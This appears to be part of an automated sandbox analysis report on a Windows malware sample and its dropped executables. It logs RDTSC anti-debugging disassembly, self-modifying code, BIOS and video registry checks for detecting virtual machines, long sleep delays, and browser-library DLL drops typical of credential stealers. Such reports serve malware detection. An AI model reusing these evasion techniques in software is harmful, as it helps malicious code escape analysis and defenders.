Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50102B0 second address: 50102B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50102B6 second address: 501031E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E907EB785h 0x00000009 xor eax, 6256A706h 0x0000000f jmp 00007F5E907EB781h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F5F02709A9Fh 0x00000020 jmp 00007F5E907EB77Ch 0x00000025 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F5E907EB787h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501031E second address: 5010324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010324 second address: 5010385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F5F02709A6Ch 0x00000011 jmp 00007F5E907EB786h 0x00000016 mov edx, dword ptr [esi+44h] 0x00000019 pushad 0x0000001a mov esi, 038E69BDh 0x0000001f push esi 0x00000020 jmp 00007F5E907EB789h 0x00000025 pop eax 0x00000026 popad 0x00000027 or edx, dword ptr [ebp+0Ch] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F5E907EB77Ah 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010385 second address: 501039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edi, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501039F second address: 50103FF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5E907EB77Eh 0x00000008 xor cl, 00000058h 0x0000000b jmp 00007F5E907EB77Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ecx, 19D8030Fh 0x00000018 popad 0x00000019 jne 00007F5F02709A37h 0x0000001f jmp 00007F5E907EB782h 0x00000024 test byte ptr [esi+48h], 00000001h 0x00000028 jmp 00007F5E907EB780h 0x0000002d jne 00007F5F02709A24h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50103FF second address: 5010403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010403 second address: 5010407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010407 second address: 501040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501040D second address: 5010446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 3Dh 0x00000005 jmp 00007F5E907EB787h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test bl, 00000007h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E907EB785h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010446 second address: 501044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501044C second address: 5010450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500072B second address: 5000790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E9072B8A7h 0x00000009 jmp 00007F5E9072B8A3h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov dword ptr [esp], ebp 0x00000017 pushad 0x00000018 mov dx, cx 0x0000001b jmp 00007F5E9072B89Eh 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5E9072B8A7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000790 second address: 5000796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000796 second address: 50007C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5E9072B8A5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50007C1 second address: 50007E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E907EB781h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50007E0 second address: 50008ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c jmp 00007F5E9072B89Eh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 pushad 0x00000014 mov eax, 0D8A6D03h 0x00000019 mov dx, si 0x0000001c popad 0x0000001d mov cx, 797Bh 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F5E9072B8A1h 0x00000028 xchg eax, esi 0x00000029 pushad 0x0000002a mov cl, A8h 0x0000002c mov eax, ebx 0x0000002e popad 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 jmp 00007F5E9072B89Bh 0x00000037 sub ebx, ebx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F5E9072B8A5h 0x00000040 sub cl, FFFFFF96h 0x00000043 jmp 00007F5E9072B8A1h 0x00000048 popfd 0x00000049 pushfd 0x0000004a jmp 00007F5E9072B8A0h 0x0000004f or cl, FFFFFFB8h 0x00000052 jmp 00007F5E9072B89Bh 0x00000057 popfd 0x00000058 popad 0x00000059 test esi, esi 0x0000005b jmp 00007F5E9072B8A6h 0x00000060 je 00007F5F0265137Fh 0x00000066 jmp 00007F5E9072B8A0h 0x0000006b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000072 jmp 00007F5E9072B8A0h 0x00000077 mov ecx, esi 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F5E9072B8A7h 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50008ED second address: 500091F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F5F0271120Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E907EB77Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500091F second address: 5000963 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7702h 0x00000007 mov bh, 01h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test byte ptr [76FB6968h], 00000002h 0x00000013 jmp 00007F5E9072B8A2h 0x00000018 jne 00007F5F02651308h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F5E9072B8A7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000963 second address: 50009AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E907EB782h 0x00000009 and esi, 4F343828h 0x0000000f jmp 00007F5E907EB77Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov edx, dword ptr [ebp+0Ch] 0x0000001b jmp 00007F5E907EB786h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 pop edi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50009AE second address: 50009C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E9072B8A0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50009C2 second address: 5000A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F5E907EB782h 0x00000015 sub ecx, 18765F48h 0x0000001b jmp 00007F5E907EB77Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F5E907EB788h 0x00000027 adc eax, 2E3321A8h 0x0000002d jmp 00007F5E907EB77Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000A28 second address: 5000A5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E9072B89Fh 0x00000009 or ch, FFFFFFEEh 0x0000000c jmp 00007F5E9072B8A9h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000A5A second address: 5000A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 jmp 00007F5E907EB77Ch 0x0000000d xchg eax, ebx 0x0000000e jmp 00007F5E907EB780h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000A86 second address: 5000A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000A8A second address: 5000AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB788h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000AA6 second address: 5000AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000B60 second address: 5000B7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 49EEh 0x00000007 mov edi, 57F116FAh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov esp, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5E907EB77Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000B7F second address: 5000B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000B85 second address: 5000B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000B89 second address: 5000B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop edx 0x0000000e mov al, 94h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010E8F second address: 5010ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, al 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, 404F91BAh 0x00000013 pushfd 0x00000014 jmp 00007F5E907EB77Bh 0x00000019 xor esi, 7C48895Eh 0x0000001f jmp 00007F5E907EB789h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010ECF second address: 5010F0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5E9072B89Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5E9072B8A7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010F0E second address: 5010F58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 pushfd 0x00000006 jmp 00007F5E907EB77Bh 0x0000000b and cl, 0000007Eh 0x0000000e jmp 00007F5E907EB789h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007F5E907EB783h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010F58 second address: 5010F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010BD7 second address: 5010C1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E907EB77Dh 0x00000009 sub ax, 7C16h 0x0000000e jmp 00007F5E907EB781h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5E907EB788h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010C1F second address: 5010C23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010C23 second address: 5010C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010C29 second address: 5010C52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 0FAE0003h 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E9072B8A7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010C52 second address: 5010C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50906F1 second address: 5090721 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx ecx, dx 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c jmp 00007F5E9072B89Fh 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F5E9072B89Bh 0x0000001a pop esi 0x0000001b mov di, D2DCh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508095D second address: 5080975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E907EB784h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080975 second address: 5080A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5E9072B8A4h 0x00000013 add cx, 6EA8h 0x00000018 jmp 00007F5E9072B89Bh 0x0000001d popfd 0x0000001e mov di, si 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 push edi 0x00000025 mov bl, ah 0x00000027 pop edx 0x00000028 pushfd 0x00000029 jmp 00007F5E9072B8A8h 0x0000002e sub cx, 1C38h 0x00000033 jmp 00007F5E9072B89Bh 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b pushad 0x0000003c call 00007F5E9072B8A4h 0x00000041 pushfd 0x00000042 jmp 00007F5E9072B8A2h 0x00000047 and cx, 55C8h 0x0000004c jmp 00007F5E9072B89Bh 0x00000051 popfd 0x00000052 pop ecx 0x00000053 movsx edx, ax 0x00000056 popad 0x00000057 mov ebp, esp 0x00000059 pushad 0x0000005a mov ebx, ecx 0x0000005c call 00007F5E9072B89Ah 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020208 second address: 502026A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5E907EB781h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F5E907EB77Ch 0x00000017 sbb esi, 6B7F74D8h 0x0000001d jmp 00007F5E907EB77Bh 0x00000022 popfd 0x00000023 mov ax, 4F8Fh 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F5E907EB781h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502026A second address: 502026F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080CC7 second address: 5080CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB780h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E907EB787h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080CF7 second address: 5080CFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080CFD second address: 5080D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5080D01 second address: 5080D3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop edx 0x0000000e pushfd 0x0000000f jmp 00007F5E9072B8A4h 0x00000014 jmp 00007F5E9072B8A5h 0x00000019 popfd 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030508 second address: 503050C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 503050C second address: 5030529 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030529 second address: 503057D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E907EB787h 0x00000009 or cx, 0C0Eh 0x0000000e jmp 00007F5E907EB789h 0x00000013 popfd 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov edx, esi 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5E907EB77Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 503057D second address: 5030583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F6EB10 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1110BA4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 119B599 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 9AEB10 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B50BA4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: BDB599 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: A1ED0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: A1EDCE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: BC72C1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: BD4DB3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Special instruction interceptor: First address: 45DBA6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Special instruction interceptor: First address: 45DAFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Special instruction interceptor: First address: 6289E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Special instruction interceptor: First address: 682B26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Special instruction interceptor: First address: 14DB8B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Special instruction interceptor: First address: 14B5FA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Special instruction interceptor: First address: 310F9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Special instruction interceptor: First address: 2F1D8C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Special instruction interceptor: First address: 384CFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: 575DB8B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: 575B5FA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: 5920F9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: 5901D8C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: 5994CFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: 644DBA6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: 644DAFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: 66189E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Special instruction interceptor: First address: 6672B26 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Memory allocated: 5170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Memory allocated: 5320000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Memory allocated: 7320000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05080C8E rdtsc

0_2_05080C8E

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe

Window / User API: threadDelayed 361

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
